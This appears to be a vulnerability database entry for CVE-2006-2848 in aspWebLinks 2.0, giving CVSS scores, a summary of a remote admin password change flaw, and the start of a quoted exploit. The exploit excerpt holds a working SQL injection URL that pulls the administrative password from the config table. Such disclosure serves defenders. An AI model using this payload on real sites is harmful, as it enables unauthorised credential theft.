5
CVSSv2

CVE-2006-2848

Published: 06/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

links.asp in aspWebLinks 2.0 allows remote malicious users to change the administrative password, possibly via a direct request with a modified txtAdministrativePassword field.

Vulnerable Product Search on Vulmon Subscribe to Product

full revolution aspweblinks 2.0

Exploits

<!-- # Title : aspWebLinks 20 Remote Admin Pass Change Exploit and linksasp SQL Injection # Author : ajann # Dork : aspWebLinks 20 SQL INJECTION: [target]/[path]/linksasp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config --> <title>AspWebLink 20 Remote Admin Pas ...